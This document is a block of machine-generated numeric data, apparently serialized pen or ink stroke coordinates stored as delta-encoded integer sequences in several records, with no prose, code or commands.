0-1,0-1 0,1 1 1,-1 0-1,1 0 1,-1 1-1,1-1 1,-1 0-1,0 0 1,1 1-1,-1-1 1,0 1-1,1-1 1,1 2-1,-1 1-7,1 1 1,-1-1-1,1 1 0,-1 0 0,0 0 1,-1 0-1,1 0 0,1 5 1,2 5-6,12 36-1261,-14-25-8035,-3-15 6050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0 106 476,'0'0'2582,"11"7"-100,-11-5-2360,0 0 1,0 0 0,0 1-1,0-1 1,0 0-1,0 0 1,1 0 0,-1 0-1,1 0 1,-1 0-1,1 0 1,0 0 0,0 0-1,0 0 1,2 3-1,-2-2-46,0 1-1,0 0 1,0 0-1,-1 0 0,0 0 1,1 0-1,-1 0 1,-1 0-1,0 7 1,0 3 205,1 15 143,1-12-348,-1 0 1,-1 1-1,0-1 1,-7 31 0,7-42-69,0 0 0,1 0 0,-1 0 0,1 0 0,1 0 0,-1 1 0,1-1 0,3 12 0,2 23 50,-6-40 483,11-19 510,-1-19-328,-3 0-63,-6 32-635,0 1 0,0 0-1,0-1 1,0 1 0,-1-1 0,1 1 0,-1-1 0,0 1 0,-1-1 0,1 1 0,-3-9 0,1 3-21,-1 0 0,1-1 0,1 1 0,0-1 0,1 1 1,0-1-1,0 1 0,1-1 0,0 1 0,1-1 0,3-10 0,-1 0 16,-4 20-16,1-1 0,-1 0 0,0 1 0,0-1-1,1 0 1,-1 1 0,1-1 0,0 0 0,-1 1 0,1-1 0,0 1 0,2-4 0,7-14 118,-9 16-88,1 0-1,-1 0 0,1 0 0,-1 0 1,1 0-1,0 1 0,0-1 0,0 1 0,0-1 1,0 1-1,3-2 0,-2 2 9,15-12 120,1 0-1,35-17 1,-50 29-164,0 0 1,0 0 0,0 0-1,1 1 1,-1-1 0,1 1-1,-1 0 1,1 0 0,0 1-1,-1-1 1,1 1 0,0 0-1,-1 0 1,1 1 0,0-1 0,-1 1-1,1 0 1,-1 0 0,9 4-1,-12-4 1,0-1-1,1 1 1,-1-1 0,0 1-1,0 0 1,0-1 0,0 1-1,-1 0 1,1 0-1,0 0 1,0 0 0,0 0-1,-1 0 1,1 0-1,0 0 1,-1 0 0,1 0-1,-1 0 1,0 0-1,1 1 1,-1-1 0,0 0-1,1 0 1,-1 0 0,0 1-1,0-1 1,0 0-1,0 0 1,-1 2 0,-16 34-27,5-14 29,8-18 2,1 1 0,-1-1 0,0 0 0,-1-1 1,1 1-1,-1-1 0,0 0 0,0 0 1,0 0-1,-6 3 0,-30 25 43,8-5 83,31-26-88,0 0-1,0 0 1,0 0-1,0 1 0,0-1 1,1 0-1,-1 1 0,0-1 1,1 1-1,-1 0 0,1 0 1,0-1-1,0 1 1,-1 0-1,1 0 0,0 0 1,0 0-1,1 0 0,-1 0 1,0 1-1,1-1 1,-1 0-1,1 0 0,0 0 1,0 1-1,0 2 0,0-1-34,1-1 1,-1 1-1,1 0 0,0 0 0,1 0 0,-1-1 0,1 1 0,-1 0 0,1-1 0,0 0 0,0 1 0,3 2 1,9 17-16,-11-19 13,0 0 0,1 0 0,-1 0 0,1-1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1-1 0,-1 0 0,1 0 0,0 0 0,9 2 0,22 11 32,-16-4-116,-14-8-21,0-1-1,0 2 0,-1-1 0,1 0 1,-1 1-1,0 0 0,0 1 0,0-1 1,0 1-1,-1 0 0,6 8 0,-4-4-1082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1284,'24'-4'4548,"7"-10"-2803,0 1-1483,-21 9-199,1 0 0,-1-1 1,-1 0-1,1 0 0,16-13 0,4-2 718,-30 20-744,1-1 0,-1 1-1,0 0 1,1-1-1,-1 1 1,0 0-1,1-1 1,-1 1 0,0 0-1,0-1 1,0 1-1,1-1 1,-1 1-1,0-1 1,0 1 0,0 0-1,0-1 1,0 1-1,0-1 1,0 1-1,0-1 1,0 1-1,0-1 1,0 1 0,0-1-1,0 1 1,0 0-1,0-1 1,-1 1-1,1-1 1,0 1 0,0-1-1,0 1 1,-1 0-1,1-1 1,0 1-1,0 0 1,-1-1-1,1 1 1,0 0 0,-1-1-1,1 1 1,-1 0-1,0-1 1,-19-10 1018,15 11-987,0 1 0,-1 0 0,1 0 0,0 1 0,-1 0 0,1 0 0,0 0 0,0 0 0,1 1 0,-1 0 0,0 0 0,1 0 0,0 1 0,0-1 0,0 1 0,0 0 0,0 0 0,1 0 0,-6 8 1,-7 20 383,12-27-371,1 0-1,0 0 1,1 1 0,-1-1-1,1 1 1,0 0-1,1-1 1,-1 1-1,1 0 1,0 0-1,0 10 1,1-10-68,0 0 0,0-1 0,0 1 0,1 0 0,0-1 0,0 1 1,1-1-1,-1 1 0,1-1 0,5 10 0,-5-12-13,0-1-1,1 1 1,-1 0 0,1-1 0,-1 0-1,1 1 1,0-1 0,0 0 0,0-1-1,1 1 1,-1 0 0,0-1 0,0 0-1,1 0 1,-1 0 0,1 0 0,5 0-1,30 10-88,12 1-1905,-47-12 1432,0 0 0,0 0 0,0 0 0,0-1-1,0 0 1,0 1 0,0-1 0,0 0-1,-1-1 1,1 1 0,6-4 0,8-6-2343,-5 4 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13 1092,'-13'-7'3406,"10"6"-3213,0 0 0,-1 0 0,1 0 0,-1 1 0,1-1 0,0 1 0,-1 0-1,1 0 1,-1 0 0,1 0 0,0 1 0,-1-1 0,1 1 0,0 0 0,-1 0 0,1 0-1,0 0 1,0 1 0,-6 2 0,8-3-175,0 0 1,1 0-1,-1 0 0,0 0 1,1 0-1,-1 0 0,1 0 1,-1 1-1,1-1 0,-1 0 1,1 0-1,0 0 0,-1 0 1,1 1-1,0-1 0,0 0 0,0 0 1,0 1-1,0-1 0,0 0 1,0 0-1,1 0 0,-1 1 1,0-1-1,1 0 0,-1 0 1,1 0-1,-1 0 0,1 0 1,-1 0-1,1 0 0,0 0 0,0 0 1,-1 0-1,1 0 0,0 0 1,1 1-1,7 5-56,-1 0 1,1 0-1,17 9 0,16 14 119,-21-16-85,-8-4 59,-13-10-49,1 1-1,-1-1 1,0 0-1,0 1 1,0-1-1,0 0 1,0 1-1,1-1 1,-1 0-1,0 1 1,0-1-1,0 0 1,0 1-1,0-1 1,0 1-1,0-1 1,0 0-1,0 1 1,0-1-1,0 0 1,0 1-1,-1-1 1,1 0-1,0 1 1,0-1-1,0 0 1,0 1-1,-1-1 1,1 0-1,0 1 1,0-1-1,-1 0 1,1 0-1,-1 1 1,-3 13 559,4-14-534,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 1,0 1-1,0-1 0,-1 0 0,1 1 0,0-1 0,0 1 0,0-1 0,0 0 0,-1 1 0,1-1 0,0 0 0,-1 1 0,1-1 0,0 0 0,0 1 0,-1-1 0,1 0 0,0 0 0,-1 1 0,1-1 0,-1 0 0,-6 4 133,0 0-1,0 0 1,0-1-1,0 0 1,0-1 0,-1 1-1,1-1 1,-1-1 0,0 1-1,1-1 1,-10 0-1,-3-2-140,15 0-28,0 1 1,0 0 0,0 0-1,0 0 1,0 0 0,0 1-1,0 0 1,0 0 0,-6 3-1,9-3-6,2 9-388,2 12-811,9-11-6312,-2-6 4717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89 104,'11'7'4721,"-2"14"-2548,-7-19-2105,-1 0 0,1 0 0,-1 0 0,0 0 0,0 0 1,0 1-1,0-1 0,0 0 0,-1 1 0,1 2 0,0 29 505,0-14-447,-1-1-1,-1 0 1,0 0 0,-8 33-1,6-38-113,0 0 0,0 0 0,2 0 0,-1 20 0,2-33 17,2-43 43,0 34-70,1 0-1,-1-1 1,-1 1 0,1 0 0,-1-11-1,6-25 4,1-10-28,-7 44 13,0 0 1,1 0 0,0 0 0,0 0 0,1 0-1,0 0 1,9-17 0,-6 19 6,0 0 0,1 0 0,0 0 0,0 0 0,1 1 0,0 1-1,0-1 1,1 1 0,0 1 0,0 0 0,0 0 0,0 0 0,18-5 0,4 5 0,-31 6 15,0-1 0,0 0 0,0 1-1,0-1 1,0 1 0,1-1 0,-1 0-1,0 1 1,0-1 0,0 1 0,0-1-1,0 0 1,0 1 0,0-1 0,0 1-1,-1-1 1,1 0 0,0 1 0,0-1-1,0 0 1,0 1 0,0-1 0,-1 1-1,1-1 1,0 0 0,0 1 0,0-1-1,-1 0 1,1 0 0,0 1 0,-1-1-1,1 0 1,0 0 0,-1 1 0,1-1-1,0 0 1,-1 0 0,-16 17 433,8-12-412,0 0 1,1 1 0,0 0-1,0 0 1,0 1-1,1 0 1,0 0-1,0 1 1,1 0-1,0 0 1,-8 15 0,-23 24-3648,31-40 1301,-3-1-220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1 140,'0'0'6613,"11"0"-6085,-11 6-416,10-6-64,-10 6-76,11-6-172,-11 6-292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7:44:3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13 132,'0'0'136,"0"-6"40,11 6-140,-11-6-16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55 1128,'-8'-4'13193,"3"3"-12574,-21 0 1474,25 1-2041,0 0 0,-1 0 0,1 0 0,0 0 1,0 0-1,-1 0 0,1 0 0,0-1 1,0 1-1,0 0 0,0-1 0,0 1 0,-1-1 1,1 1-1,0-1 0,0 0 0,0 1 1,0-1-1,1 0 0,-1 0 0,0 0 0,-1-1 1,-28-6 626,26 6-552,4 2-110,-1 0 0,1 0 1,-1 0-1,1-1 0,-1 1 0,1 0 1,-1-1-1,1 1 0,-1 0 0,1-1 1,0 1-1,-1 0 0,1-1 0,0 1 1,-1-1-1,1 1 0,0-1 0,-1 1 1,1-1-1,0 1 0,0-1 0,0 1 1,-1-1-1,1 1 0,0-1 0,0 0 1,0 1-1,0-1 0,0 1 0,0-2 0,-45 0 782,41 0-762,0 0 1,-1 1 0,1-1-1,-1 1 1,0 0 0,1 0-1,-1 1 1,0-1 0,-4 1-1,7 0 13,0 0-9,-1 0 0,0-1 0,1 2 0,-1-1-1,0 0 1,1 1 0,-1-1 0,1 1 0,-1 0 0,1-1-1,-4 3 1,-44-3 493,-17 23-435,64-22-96,0 1 0,0-1 0,-1 1 0,1 0 0,0 0 0,1 0 0,-1 0 0,-5 5 0,-12 9 11,19-16-13,1 0 1,-1 0-1,0 0 1,1 0-1,-1 1 0,0-1 1,1 0-1,-1 1 1,0-1-1,1 0 1,-1 1-1,1-1 1,-1 1-1,0-1 1,1 1-1,-1-1 1,1 1-1,0-1 1,-1 1-1,1 0 0,-1-1 1,1 1-1,0 0 1,-1-1-1,1 1 1,0 0-1,0-1 1,0 1-1,-1 0 1,1 0-1,0-1 1,0 1-1,0 0 1,0-1-1,0 1 0,1 0 1,-1 0-1,0 0 0,0-1-1,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 1,0 0-1,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 1 0,1-1 0,0 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,-1 1 0,1-1 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 1,0 0-1,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 1,1 0-1,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1-1 0,0 1 0,0 0 0,0 0 0,-2 0 81,-22 23 202,21-21-274,2-2-8,1 0-1,0 0 1,-1 0-1,1 0 0,0 1 1,0-1-1,-1 0 1,1 0-1,0 0 1,-1 1-1,1-1 1,0 0-1,0 0 1,0 1-1,-1-1 1,1 0-1,0 1 0,0-1 1,0 0-1,0 1 1,-1-1-1,1 0 1,0 1-1,0-1 1,0 0-1,0 1 1,0-1-1,0 0 1,0 1-1,0-1 0,0 0 1,0 1-1,0-1 1,0 0-1,1 1 1,-11 8-3,9-9 2,0 0 0,1 0 0,-1 1 0,0-1 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 1 0,1-1 0,-1 1 0,1-1 0,-1 1 0,1-1 0,-1 1 0,1-1 0,0 1 0,-1-1 0,1 1 0,0 0 0,-1 0 0,-10 19 25,15-4-4,-7-13-35,-7 2 7,9-3 2,-1 0 0,1 0 0,0 0-1,-1 1 1,1-1 0,0 0 0,1 1 0,-1-1-1,0 0 1,1 1 0,-1-1 0,1 5 0,-13 18 121,6-5-122,7-19 7,-1 0-1,1 1 0,0-1 1,0 1-1,-1-1 1,1 0-1,-1 1 0,1-1 1,-1 0-1,0 0 0,1 1 1,-1-1-1,0 0 1,0 0-1,-2 2 0,3-3 1,-1 1 0,1-1-1,0 1 1,0-1-1,-1 0 1,1 1 0,0-1-1,0 1 1,-1-1-1,1 1 1,0-1 0,0 1-1,0-1 1,0 1-1,0 0 1,0-1 0,0 1-1,0-1 1,0 1-1,0-1 1,0 1 0,0-1-1,0 1 1,1 0-1,-2 10-1,0-10 0,0-1-1,0 1 1,0-1 0,1 1 0,-1 0 0,0-1 0,1 1-1,-1 0 1,1 0 0,-1-1 0,1 1 0,-1 0 0,1 0-1,-1 0 1,1 0 0,0 0 0,0 0 0,-1-1 0,1 1-1,0 0 1,0 0 0,0 0 0,0 0 0,0 0 0,0 0-1,0 0 1,0 0 0,1 0 0,-1 0 0,0 1 0,1 8-4,-12 28 12,11-36-5,0-1-1,-1 0 0,1-1 0,0 1 0,0 0 0,0 0-1,0 0 1,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,1 0 0,-1-1 0,0 1 0,0 0 0,1 0 0,-1-1 0,1 1 0,-1 0-1,1 0 1,-1-1 0,1 1 0,-1-1 0,1 1 0,-1 0 0,1-1 0,0 1 0,-1-1 0,2 1 0,1 21 6,-2-21-7,-1-1 0,0 0 0,1 0 0,-1 1 0,0-1 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 0 0,0 1 0,0-1 0,0 1 0,1-1 0,-1 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,-1-1 0,1 1 0,0-1 0,0 0 0,-1 1 0,-3 21-5,4-21 0,-2 11 18,1-11-13,-1 0-1,1 0 0,0 0 1,0 1-1,1-1 1,-1 0-1,0 1 0,0-1 1,1 0-1,-1 1 0,0-1 1,1 1-1,-1-1 1,1 1-1,0-1 0,0 1 1,0-1-1,-1 1 0,1 0 1,1-1-1,-1 1 0,0-1 1,0 1-1,0-1 1,1 1-1,-1-1 0,1 1 1,-1-1-1,1 1 0,0-1 1,0 0-1,1 3 0,5 14 4,-3-5 26,-3-12-29,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 1 0,-1-1 0,1 0 0,-1 0 0,0 1 0,0-1 0,1 0 0,-1 0 1,0 1-1,0-1 0,-1 2 0,34 28 64,-28-23-48,-5-8-16,0 1 0,1-1 1,-1 0-1,0 0 0,1 0 1,-1 1-1,0-1 0,1 0 0,-1 0 1,0 1-1,0-1 0,1 0 1,-1 0-1,0 1 0,0-1 1,1 0-1,-1 1 0,0-1 1,0 0-1,0 1 0,0-1 1,0 0-1,0 1 0,0-1 1,1 1-1,-1-1 0,0 0 0,0 1 1,0-1-1,0 0 0,-1 1 1,2 1 1,1 1 1,-1-1-1,0 0 1,1 0 0,-1-1-1,1 1 1,-1 0-1,1 0 1,0-1-1,0 1 1,0-1 0,0 0-1,0 1 1,0-1-1,3 1 1,-4-1 6,1 0 10,32 18-236,-32-18 245,1 1 0,-1-1 1,1 0-1,-1 0 1,1 0-1,0 0 0,-1 0 1,1 0-1,0-1 0,0 1 1,-1-1-1,6 0 0,-2 2 33,22 2-56,-10-3-45,-12-1 50,0 1-1,0-1 1,0 0 0,0-1 0,0 0 0,0 0 0,10-3-1,58-8-5,-6 6 11,7-31-2,-55 30-19,21-18-1,-38 18 7,-2 4 0,28-10 35,24-41-53,-49 36 60,-2 16-38,0 1-1,-1-1 0,1 0 0,0 0 0,-1 0 0,0 0 0,1 0 0,-1-1 0,0 1 1,0 0-1,0-1 0,0 1 0,-1 0 0,1-1 0,-1 1 0,0-1 0,1-2 0,10-15-91,-1-28 84,-6 41 15,-3 6-10,0 0-1,-1 1 0,1-1 0,-1 0 0,1 1 1,-1-1-1,1 0 0,-1 0 0,1 0 1,-1 0-1,0 0 0,0 1 0,1-1 1,-1 0-1,0 0 0,0 0 0,0 0 1,0-1-1,11-41-7,-12 34 6,1 7 1,-1 1-1,1-1 1,0 0 0,0 0-1,0 0 1,0 1 0,0-1 0,0 0-1,0 0 1,0 1 0,1-1-1,-1 0 1,1 0 0,0 1-1,-1-1 1,1 0 0,0 1-1,0-1 1,0 1 0,0-1-1,2-1 1,-2-2 2,1-1 0,-2 1-1,1-1 1,0 1 0,-1-1 0,0 1-1,0-1 1,-2-9 0,1 1-2,-10-16 23,6 12-389,-1-8 736,2 19-361,3 7-9,1-1 1,-1 1-1,1 0 0,0 0 0,-1-1 1,1 1-1,-1 0 0,1-1 0,0 1 1,-1 0-1,1-1 0,0 1 0,-1-1 1,1 1-1,0-1 0,0 1 0,-1 0 1,1-1-1,0 1 0,0-1 0,0 1 1,0-1-1,0 1 0,-1-1 0,1 1 1,0-1-1,0 1 0,0-1 0,0 1 1,1-1-1,-1 1 0,0-1 0,0 1 1,0-2-1,-1 1 3,0 0 1,0 0-1,1 0 1,-1 0-1,0 0 1,0 0-1,0 0 1,1 0-1,-1 0 0,1 0 1,-1-1-1,1 1 1,-1 0-1,1-2 1,-1 3-4,1 0 0,0 0 0,0 0 1,-1 0-1,1 0 0,0 0 0,0 0 1,-1 0-1,1 0 0,0 0 0,-1 0 0,1 0 1,0 0-1,0 0 0,-1 0 0,1 0 0,0 0 1,0 0-1,-1-1 0,1 1 0,0 0 1,0 0-1,0 0 0,-1 0 0,1 0 0,0-1 1,0 1-1,0 0 0,-1 0 0,1-1 0,0 1 1,0 0-1,0 0 0,0 0 0,0-1 1,0 1-1,0 0 0,0-1 0,-1 1 0,-10-19-9,7 15 43,0 1 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 1 0,-10-4 0,-18-9 210,29 14-209,0 0 1,-1 0 0,1 0 0,0 0 0,-1 0 0,1 1 0,-1 0 0,1-1 0,-1 1 0,1 0 0,-1 1 0,0-1-1,1 1 1,0 0 0,-5 1 0,-3 1-409,0 1-1,0 1 1,-17 9-1,-35 22-5246,18-19-5923,35-16 7940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12 312,'0'0'181,"0"0"1,0-1-1,0 1 0,0-1 0,-1 1 1,1 0-1,0-1 0,0 1 0,-1 0 1,1-1-1,0 1 0,0 0 1,-1-1-1,1 1 0,0 0 0,-1 0 1,1-1-1,0 1 0,-1 0 0,1 0 1,0 0-1,-1 0 0,1-1 0,0 1 1,-1 0-1,1 0 0,-1 0 1,1 0-1,0 0 0,-1 0 0,1 0 1,-1 0-1,1 0 0,0 0 0,-1 0 1,1 0-1,-1 0 0,1 1 0,0-1 1,-1 0-1,1 0 0,-1 0 1,1 1-104,-1-1 1,1 0 0,-1 0 0,1 0 0,0 1 0,-1-1 0,1 0-1,-1 1 1,1-1 0,0 0 0,-1 1 0,1-1 0,0 1 0,-1-1-1,1 0 1,0 1 0,0-1 0,0 1 0,-1-1 0,1 1-1,0-1 1,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0-139,2-1-1811,-2 0 1689,1-1 0,-1 1 0,1 0 0,-1 0 0,1-1 1,-1 1-1,1 0 0,-1-1 0,1 1 0,-1-1 0,0 1 0,1 0 0,-1-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,0 1 0,1-1 1,-1 1-1,0-1 0,0 1 0,0-1 0,0 0 0,0 0 0,0-5-1989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0 140,'0'0'3572,"-2"9"2730,-5 2-5614,4 5 65,-26 14-357,27-26-601,-5 7-76,4-11-375,2-8-703,1-6-4199,0-2 3050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68,'11'-6'4828,"-13"35"-3424,1-29-1388,1 1 0,-1-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,1 1 0,-1 0 0,1-1 0,-1 1 0,1 0 0,0-1-1,-1 1 1,1 0 0,-1 0 0,1-1 0,0 1 0,0 0 0,0 0 0,-1 0 0,1 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0-1 0,1 1 0,-1 1 0,0 0-2,-13 23 417,-5 5-1,17-29-398,20-37-5230,-17 29 3102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0 112,'0'0'1355,"9"0"-243,-10 1-910,0-1 1,0 1-1,0-1 1,0 1-1,0-1 1,0 1-1,0 0 0,0-1 1,0 1-1,0 0 1,0 0-1,0 0 1,0 0-1,1 0 1,-1 0-1,0 0 0,1 0 1,-1 0-1,1 0 1,-1 0-1,1 0 1,-1 0-1,1 0 0,0 1 1,0-1-1,0 0 1,-1 0-1,1 0 1,1 3-1,33 4 1242,-31-7-1382,0 0 0,1 0 1,-1 0-1,1-1 1,-1 1-1,1-1 0,-1 0 1,1 1-1,3-2 0,-3 1-33,-1 0-1,1 0 0,-1 0 1,0 0-1,1 1 0,-1-1 1,0 1-1,7 2 0,-6-2-99,0-1 0,0 1 0,1-1 0,-1 0 0,0 0 0,0 0 0,0 0 0,0-1 0,1 0 0,-1 0 0,0 0-1,6-3 1,23-13-4546,-31 11 2296,-2 0-163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36,'10'-17'5902,"-11"19"-5941,0-2 406,0 1 0,1-1 0,-1 1 0,0-1 0,1 1 0,-1-1 0,1 1 0,-1 0 0,1-1 0,-1 1 0,1 0 0,0-1 0,-1 1 0,1 0 0,0 0 0,-1-1 0,1 1 0,0 0 1,0 0-1,0 1 394,1 10 2336,3-12-3011,-3 0-72,-1 0-1,1 0 1,-1-1-1,1 1 1,-1 0 0,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,-1 0 1,1 1 0,-1-1-1,1 0 1,-1 0-1,1 1 1,-1-1-1,0 0 1,1 0-1,-1 1 1,1-1-1,-1 0 1,0 1 0,1-1-1,-1 1 1,0-1-1,0 0 1,1 1-1,30 13 506,-10-5-343,-19-7-168,0 0 1,1-1-1,-1 1 0,1-1 0,0 0 0,-1 0 1,1 0-1,0 0 0,0 0 0,-1 0 0,6 0 1,7-1 25,-4-1 21,0 1 1,1 1-1,-1 0 1,14 3-1,-3-3-35,-21-2-17,1 1 0,-1 0 0,1-1 0,-1 1 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1 1 0,1-1-1,0 0 1,-1 1 0,1-1 0,-1 1 0,1-1 0,-1 1 0,1 0 0,1 1 0,32 5 154,58-7 3,-91 0-164,17 4 71,0-1 0,0 0 0,33-1 0,-1-2-161,-50 0 78,44-6 145,-35 6-120,-6-1-10,0 1 0,1-1 1,-1 1-1,0 0 0,0 1 0,0-1 0,0 1 0,1-1 0,-1 1 0,7 3 0,34-3 115,20-1-95,-15 0-350,-48 0 303,4 3 86,1-1 0,0 0 0,0 0 0,0-1-1,11 1 1,-16-2-26,-1 1-34,0 0-1,0 0 1,1 0-1,-1-1 0,0 1 1,1-1-1,-1 1 1,0-1-1,1 1 1,-1-1-1,1 0 1,-1 0-1,1 1 1,-1-1-1,1 0 1,-1 0-1,1-1 1,-1 1-1,4-1 0,7 1-12,17 7 12,15-2 79,-41-1-36,-2-3-40,-1-1 0,0 1 0,1-1 1,-1 1-1,0-1 0,1 1 0,-1-1 0,0 0 0,1 1 0,-1-1 0,1 1 0,-1-1 0,1 0 0,-1 1 0,1-1 0,-1 0 0,1 1 0,-1-1 1,1 0-1,-1 0 0,1 0 0,1 1 0,26 5 271,-26-6-117,32-6 1338,-21 3-1204,-38 0-1624,-27-7-7072,18 2 2507,12 7 2165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11 322 112,'0'0'3784,"-11"5"-1543,11-10 717,1-8 1672,7 1-4241,7-23-349,-3 19-62,-3 1 22,-2 10-1,-5 4 3,-1-2 26,-1 1 0,1 0 0,0 0 0,0 0 0,0-1 0,0 1 0,1 0 0,-1 0-1,1 0 1,-1 1 0,1-1 0,0 0 0,2-2 0,-1-13 329,1 16-335,-3 0-19,-1 1 1,0 0 0,1 0-1,-1 0 1,0 0-1,1-1 1,-1 1 0,0 0-1,1 0 1,-1-1-1,0 1 1,0 0-1,1-1 1,-1 1 0,0 0-1,0-1 1,0 1-1,1 0 1,-1-1-1,0 1 1,0 0 0,0-1-1,0 1 1,0-1-1,0 1 1,0 0 0,0-1-1,0 1 1,0-1-1,0 1 1,0 0-1,0-1 1,0 1 0,0 0-1,0-1 1,-1 0-1,21-16 231,5-18 97,4 10 435,-27 24-688,1-2-56,1-1 0,0 1-1,0 0 1,0 0 0,0 0 0,0 0-1,8-3 1,-10 5-4,3-9 90,-5 10-107,0 0 0,0 0 1,0-1-1,0 1 0,0 0 1,0 0-1,0 0 1,0-1-1,0 1 0,0 0 1,0 0-1,0 0 1,0 0-1,0-1 0,0 1 1,0 0-1,1 0 1,-1 0-1,0 0 0,0-1 1,0 1-1,0 0 0,0 0 1,0 0-1,0 0 1,0 0-1,1-1 0,-1 1 1,0 0-1,0 0 1,0 0-1,0 0 0,1 0 1,-1 0-1,0 0 0,0 0 1,0 0-1,0-1 1,1 1-1,-1 0 0,0 0 1,0 0-1,0 0 1,1 0-1,-1 0 0,0 0 1,0 0-1,0 0 1,0 1-1,1-1 0,-1 0 1,0 0-1,0 0 0,0 0 1,0 0-1,1 0 1,-1 0-1,0 0 0,0 0 1,0 0-1,0 1 1,1-1-1,6-3 69,0 1 0,0 0 0,0 1-1,0 0 1,10-1 0,15-16 96,-21 13-78,10-2-51,-19 7-26,29 11-5,-29-10 11,-2-1 1,-1 3-16,11 5 29,-9-7-15,1-1-5,0 0 0,0 0 0,0 0 1,-1 1-1,1-1 0,0 0 1,0 1-1,-1 0 0,1-1 1,0 1-1,-1 0 0,4 2 0,0 0-48,-3-2 52,0 0-2,1 0 1,-1 1-1,1-1 0,-1 1 0,1 0 0,-1 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 1 0,1 2 0,19 8 79,21 7 320,-44-18-411,11 1 4,-9-3 1,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1-1,0 0 1,0 1 0,0-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,0 1-1,0 0 1,0-1 0,-1 1 0,1 0 0,0 0 0,-1 0 0,1-1 0,0 1-1,-1 0 1,1 0 0,-1 0 0,1 2 0,-1-2-5,11 6 27,-3 2 14,-7-9-40,0 1 0,0-1 1,0 1-1,0 0 0,0-1 0,0 1 0,-1 0 0,1 0 1,0 0-1,-1-1 0,1 1 0,0 0 0,-1 0 1,1 0-1,-1 0 0,1 2 0,3 2 19,-3-5-18,-1 1 0,1-1-1,-1 0 1,0 0 0,1 0 0,-1 1 0,0-1 0,1 0-1,-1 1 1,0-1 0,1 0 0,-1 1 0,0-1 0,1 0 0,-1 1-1,0-1 1,0 0 0,0 1 0,1-1 0,-1 1 0,0-1 0,0 1-1,0-1 1,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1-1,0-1 1,0 1 0,-1 3 9,1-2-10,0 0 0,-1-1 0,1 1 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,1 0 0,-1 0 0,0-1 0,1 1 0,0 0 0,-1-1 0,1 1 0,0 0 0,0-1 0,-1 1 0,1-1 0,0 1 0,2 1 0,-3-3-2,1 1 0,-1-1 1,0 1-1,1-1 0,-1 1 0,0-1 0,0 1 0,0-1 0,0 1 1,1-1-1,-1 1 0,0 0 0,0-1 0,0 1 0,0-1 0,0 1 1,0-1-1,0 1 0,-1 0 0,1-1 0,0 1 0,0-1 0,0 1 1,0-1-1,-1 1 0,1-1 0,0 1 0,-1-1 0,1 1 0,0-1 1,-1 1-1,1-1 0,0 0 0,-1 1 0,1-1 0,-1 1 0,-5 9 50,6-9-46,0-1-5,0 0 1,0 0 0,1 0 0,-1 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1 1 0,-1-1 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,1-1 0,-1 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 1,0 0-1,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 1 0,1-1 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,-9 11 10,7-10-7,-3 14 20,4-14-22,1-1 0,-1 1 0,1 0 0,-1-1 0,1 1 0,0 0 0,-1-1 0,1 1 0,0 0 1,-1 0-1,1-1 0,0 1 0,0 0 0,0 0 0,-1-1 0,1 1 0,0 0 0,0 0 0,0-1 0,1 2 0,-1 51 310,0-52-233,1-13 18,0 12-162,-1 0 0,0 0-1,0 0 1,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0-1 0,0 1-1,1 0 1,-1 0 0,0 0 0,0 0 0,1 0 0,-1-1 0,0 1 0,0 0-1,1 0 1,-1 0 0,0-1 0,0 1 0,0 0 0,0 0 0,1-1 0,-1 1-1,0 0 1,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0-1,0 0 1,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0-1,0-1 1,0 1 0,0 0 0,0-1 0,0 1 0,-1 0 0,1 0 0,0-1-1,0 1 1,0 0 0,0 0 0,-1 0 0,1-1 0,0 1 0,0 0 0,-1 0-1,1 0 1,0-1 0,0 1 0,-1 0 0,1 0 0,-20-23-6573,14 16 4071,-5-5-1121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0 112,'0'0'721,"9"0"162,-14 2-432,11 2 1658,-15-8-238,11 7-500,5 11 5165,2 4-5190,-9-18-1336,0 0 0,-1 0 0,1 0-1,0 1 1,-1-1 0,1 